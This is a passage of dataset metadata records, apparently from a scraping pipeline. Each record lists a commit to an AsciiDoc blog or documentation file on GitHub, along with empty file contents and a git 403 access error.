2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","new_file":"_posts\/2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a851e0716defe7a82e8e200ea8761f0dc4b93833","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94dd9e88a655e1fe3b9132474a692009fdd24d5","subject":"y2b create post Razer Sabertooth Gaming Controller -- XBOX 360, PC (CES 2013)","message":"y2b create post Razer Sabertooth Gaming Controller -- XBOX 360, PC (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-09-Razer-Sabertooth-Gaming-Controller--XBOX-360-PC-CES-2013.adoc","new_file":"_posts\/2013-01-09-Razer-Sabertooth-Gaming-Controller--XBOX-360-PC-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf9cebbc33fa3c11e54d4118bcd9fd5a0058df6","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1cfa7949d9802fe00c28ebb0db05026b88b69f3","subject":"y2b create post Huawei Mate 10 Live Hands On","message":"y2b create post Huawei Mate 10 Live Hands On","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-16-Huawei-Mate-10-Live-Hands-On.adoc","new_file":"_posts\/2017-10-16-Huawei-Mate-10-Live-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"fb722f0d3b0ec5d7d553ef71574ecc3687937a92","subject":"Update 2015-08-07-GWC-Takes-Times-Square.adoc","message":"Update 2015-08-07-GWC-Takes-Times-Square.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-08-07-GWC-Takes-Times-Square.adoc","new_file":"_posts\/2015-08-07-GWC-Takes-Times-Square.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0e2e78e8cbada9e2215a34baa61a1a775764848","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b92a06f825f36cca22d0004bcda94cca3e6b1fe","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9b79e68bb06b068c06c77617d29075c3ea570e","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89289737f2a15a4ee94b7659a797d41d6115f6f8","subject":"Update 2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","message":"Update 2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","new_file":"_posts\/2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0825ad2ce567f043a0d11c0b26d4e9a08dc26bc","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 
2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be93848b296556e38922e395faa194369c2feb96","subject":"y2b create post Austin Evans loses everything - We respond.","message":"y2b create post Austin Evans loses everything - We respond.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-10-Austin-Evans-loses-everything--We-respond.adoc","new_file":"_posts\/2014-02-10-Austin-Evans-loses-everything--We-respond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf1d0085bceae150eb3c952b523844b0a01d96e","subject":"Update 2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","message":"Update 2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","new_file":"_posts\/2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6884bae49fe608dc7a21d6f91504329eaeef0645","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb4cba6e9192c101bdfa02866869b1adcc8a46a","subject":"Update 2014-08-21-Design-considerations.adoc","message":"Update 2014-08-21-Design-considerations.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-08-21-Design-considerations.adoc","new_file":"_posts\/2014-08-21-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803fbeed559cc40da456e93909f1700676cfbda8","subject":"Update 2015-05-11-Le-breizhcamp-a-5-ans.adoc","message":"Update 
2015-05-11-Le-breizhcamp-a-5-ans.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-05-11-Le-breizhcamp-a-5-ans.adoc","new_file":"_posts\/2015-05-11-Le-breizhcamp-a-5-ans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7448e07dda0547ef8d38365b4688f1b3966cf39a","subject":"Update 2015-06-05-First-week-on-the-job.adoc","message":"Update 2015-06-05-First-week-on-the-job.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-06-05-First-week-on-the-job.adoc","new_file":"_posts\/2015-06-05-First-week-on-the-job.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba5bee04f9d98a8044cacfbed04a687e1b035fae","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fe25ce0f6bcdc5d784c810d5840cc6d17d4ece5","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5013034217da21f6545ec65cd5562a661bddc878","subject":"Fixes #555, add testing guide","message":"Fixes #555, add testing guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-testing.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"137e693ec76f7dafeb519837bb678d69ce55b3fd","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 
2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93ba800c3b0d04e252034d0eed250dd0363c12c3","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb23833faf861eecff68eb5c4d9aa137f6b1e601","subject":"Added Xpath language docs to Gitbook","message":"Added Xpath language docs to Gitbook\n","repos":"gnodet\/camel,gilfernandes\/camel,anoordover\/camel,lburgazzoli\/camel,rmarting\/camel,apache\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,tdiesler\/camel,RohanHart\/camel,NickCis\/camel,tkopczynski\/camel,jkorab\/camel,gnodet\/camel,nboukhed\/camel,neoramon\/camel,tkopczynski\/camel,tkopczynski\/camel,kevinearls\/camel,chirino\/camel,yuruki\/camel,davidkarlsen\/camel,chirino\/camel,allancth\/camel,acartapanis\/camel,jarst\/camel,kevinearls\/camel,hqstevenson\/camel,sirlatrom\/camel,tlehoux\/camel,jonmcewen\/camel,gautric\/camel,w4tson\/camel,onders86\/camel,RohanHart\/camel,sirlatrom\/camel,w4tson\/camel,adessaigne\/camel,nikhilvibhav\/camel,drsquidop\/camel,objectiser\/camel,mgyongyosi\/camel,sverkera\/camel,CodeSmell\/camel,acartapanis\/camel,isavin\/camel,jonmcewen\/camel,acartapanis\/camel,prashant2402\/camel,NickCis\/camel,onders86\/camel,neoramon\/camel,tdiesler\/camel,sabre1041\/camel,pkletsko\/camel,isavin\/camel,onders86\/camel,tdiesler\/camel,dmvolod\/camel,isavin\/camel,neoramon\/camel,kevinearls\/camel,hqstevenson\/camel,pax95\/camel,acartapanis\/camel,drsquidop\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,gilfernandes\/camel,apache\/camel,pax95\/camel,pmoerenhout\/camel,Thopap\/camel,curso007\/camel,bgaudaen\/camel,jamesnetherton\/camel,curso007\/camel,driseley\/camel,apache\/camel,christophd\/camel,akhettar\/camel,yuruki\/camel,acartapanis\/camel,tlehoux\/camel,bhaveshdt\/camel,Fabryprog\/camel,pmoerenhout\/camel,isavin\/camel,onders86\/camel,dmvolod\/camel,lburgazzoli\/camel,driseley\/camel,ssharma\/camel,nicolaferraro\/camel,driseley\/camel,jarst\/camel,RohanHart\/camel,apache\/camel,davidkarlsen\/camel,dmvolod\/camel,yuruki\/camel,bgaudaen\/camel,snurmine\/camel,pkletsko\/camel,dmvolod\/camel,salikjan\/camel,pax95\/camel,mgyongyosi\/camel,davidkarlsen\/camel,anton-k11\/camel,objectiser\/camel,onders86\/camel,pmoerenhout\/camel,drsquidop\/camel,gilfernandes\/camel,jamesnetherton\/camel,neoramon\/camel,gautric\/camel,nboukhed\/camel,gautric\/camel,curso007\/camel,ullgren\/camel,NickCis\/camel,gnodet\/camel,alvi
nkwekel\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,ssharma\/camel,ssharma\/camel,davidkarlsen\/camel,mcollovati\/camel,jonmcewen\/camel,cunningt\/camel,jkorab\/camel,lburgazzoli\/apache-camel,DariusX\/camel,adessaigne\/camel,adessaigne\/camel,dmvolod\/camel,adessaigne\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,mcollovati\/camel,ullgren\/camel,nikhilvibhav\/camel,adessaigne\/camel,apache\/camel,CodeSmell\/camel,bhaveshdt\/camel,prashant2402\/camel,jarst\/camel,jkorab\/camel,bhaveshdt\/camel,snurmine\/camel,punkhorn\/camel-upstream,nboukhed\/camel,drsquidop\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,CodeSmell\/camel,dmvolod\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,sirlatrom\/camel,gautric\/camel,prashant2402\/camel,curso007\/camel,zregvart\/camel,rmarting\/camel,yuruki\/camel,pax95\/camel,sabre1041\/camel,alvinkwekel\/camel,scranton\/camel,anoordover\/camel,tdiesler\/camel,allancth\/camel,akhettar\/camel,tadayosi\/camel,scranton\/camel,gautric\/camel,isavin\/camel,tdiesler\/camel,ssharma\/camel,mgyongyosi\/camel,mcollovati\/camel,pax95\/camel,anton-k11\/camel,jonmcewen\/camel,salikjan\/camel,veithen\/camel,christophd\/camel,nboukhed\/camel,jonmcewen\/camel,anton-k11\/camel,drsquidop\/camel,tlehoux\/camel,driseley\/camel,anoordover\/camel,bhaveshdt\/camel,drsquidop\/camel,christophd\/camel,pkletsko\/camel,anoordover\/camel,sverkera\/camel,tlehoux\/camel,cunningt\/camel,w4tson\/camel,veithen\/camel,snurmine\/camel,christophd\/camel,pkletsko\/camel,christophd\/camel,lburgazzoli\/camel,anton-k11\/camel,w4tson\/camel,sirlatrom\/camel,jarst\/camel,hqstevenson\/camel,nicolaferraro\/camel,chirino\/camel,chirino\/camel,neoramon\/camel,nicolaferraro\/camel,tkopczynski\/camel,sirlatrom\/camel,jamesnetherton\/camel,tkopczynski\/camel,sirlatrom\/camel,Thopap\/camel,akhettar\/camel,w4tson\/camel,punkhorn\/camel-upstream,Thopap\/camel,sverkera\/camel,pkletsko\/camel,DariusX\/camel,rmarting\/camel,lburgazzoli\/apache-camel,zregvart\/camel,sabre1041\/camel,bhaveshdt\/camel,tadayosi\/camel,prashant2402\/camel,adessaigne\/camel,gilfernandes\/camel,cunningt\/camel,mgyongyosi\/camel,gnodet\/camel,kevinearls\/camel,tdiesler\/camel,mgyongyosi\/camel,scranton\/camel,anoordover\/camel,mcollovati\/camel,snurmine\/camel,alvinkwekel\/camel,chirino\/camel,jkorab\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,curso007\/camel,mgyongyosi\/camel,cunningt\/camel,hqstevenson\/camel,zregvart\/camel,allancth\/camel,sverkera\/camel,jamesnetherton\/camel,jkorab\/camel,nboukhed\/camel,anton-k11\/camel,RohanHart\/camel,akhettar\/camel,lburgazzoli\/camel,sabre1041\/camel,NickCis\/camel,chirino\/camel,yuruki\/camel,tadayosi\/camel,driseley\/camel,Fabryprog\/camel,Fabryprog\/camel,rmarting\/camel,akhettar\/camel,bgaudaen\/camel,zregvart\/camel,alvinkwekel\/camel,lburgazzoli\/apache-camel,gautric\/camel,allancth\/camel,rmarting\/camel,bgaudaen\/camel,tadayosi\/camel,lburgazzoli\/camel,gilfernandes\/camel,veithen\/camel,allancth\/camel,pax95\/camel,cunningt\/camel,acartapanis\/camel,RohanHart\/camel,sabre1041\/camel,veithen\/camel,pkletsko\/camel,prashant2402\/camel,tadayosi\/camel,scranton\/camel,yuruki\/camel,hqstevenson\/camel,driseley\/camel,sverkera\/camel,Thopap\/camel,onders86\/camel,isavin\/camel,tadayosi\/camel,ullgren\/camel,DariusX\/camel,akhettar\/camel,jarst\/camel,veithen\/camel,sverkera\/camel,bgaudaen\/camel,christophd\/camel,apache\/camel,RohanHart\/camel,anton-k11\/camel,snurmine\/camel,Thopap\/camel,anoordover\/camel,gilfernandes\/camel,hqstevenson\/camel,k
evinearls\/camel,ssharma\/camel,Thopap\/camel,objectiser\/camel,bgaudaen\/camel,rmarting\/camel,curso007\/camel,jkorab\/camel,scranton\/camel,prashant2402\/camel,NickCis\/camel,bhaveshdt\/camel,objectiser\/camel,neoramon\/camel,jamesnetherton\/camel,lburgazzoli\/camel,ssharma\/camel,DariusX\/camel,Fabryprog\/camel,CodeSmell\/camel,sabre1041\/camel,allancth\/camel,jonmcewen\/camel,nboukhed\/camel,veithen\/camel,scranton\/camel,tlehoux\/camel,NickCis\/camel,ullgren\/camel,jarst\/camel,w4tson\/camel,snurmine\/camel","old_file":"camel-core\/src\/main\/docs\/xpath-language.adoc","new_file":"camel-core\/src\/main\/docs\/xpath-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc4e60d1d83444fdbbf56daff0fe0d2a9b80b6a3","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a74792bbefab9b21b95d9800406e823183a92439","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028df688a3716abb3eb6392cff52d91affebdb23","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"067207d4ecd4328414b25a31e53c6932c9fa668c","subject":"Fixed encoding issue","message":"Fixed encoding issue\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b91c311043749f27ce93f144816a50a24f11ddb1","subject":"Publish 10th-November-2015-Evolve.adoc","message":"Publish 10th-November-2015-Evolve.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"10th-November-2015-Evolve.adoc","new_file":"10th-November-2015-Evolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4566cf07794924ad65dbe84a4dd503cb00abff4","subject":"Update 2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","message":"Update 2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","repos":"jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io","old_file":"_posts\/2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","new_file":"_posts\/2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkschneider\/jkschneider.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbac6d70ef6751046b8a7ca04f3dd30f4e1144cd","subject":"y2b create post New iPad 5 Smart Covers Leaked? (First Look + Demo)","message":"y2b create post New iPad 5 Smart Covers Leaked? (First Look + Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-26-New-iPad-5-Smart-Covers-Leaked-First-Look--Demo.adoc","new_file":"_posts\/2013-09-26-New-iPad-5-Smart-Covers-Leaked-First-Look--Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4c39a913d12f296457e39ae9a04fcd6809782e","subject":"Update 2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","message":"Update 2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","new_file":"_posts\/2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00de2a76c8e7a06e25e9a9c4e057e36333aa2495","subject":"y2b create post N-Control Avenger for PS3 Controller Unboxing \\u0026 First Look","message":"y2b create post N-Control Avenger for PS3 Controller Unboxing \\u0026 First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-14-NControl-Avenger-for-PS3-Controller-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2012-05-14-NControl-Avenger-for-PS3-Controller-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7ff152955d36285f8a3d934cd0d641f7ea354cb","subject":"y2b create post OnePlus 5T Unboxing - Is This The One?","message":"y2b create post OnePlus 5T Unboxing - Is This The 
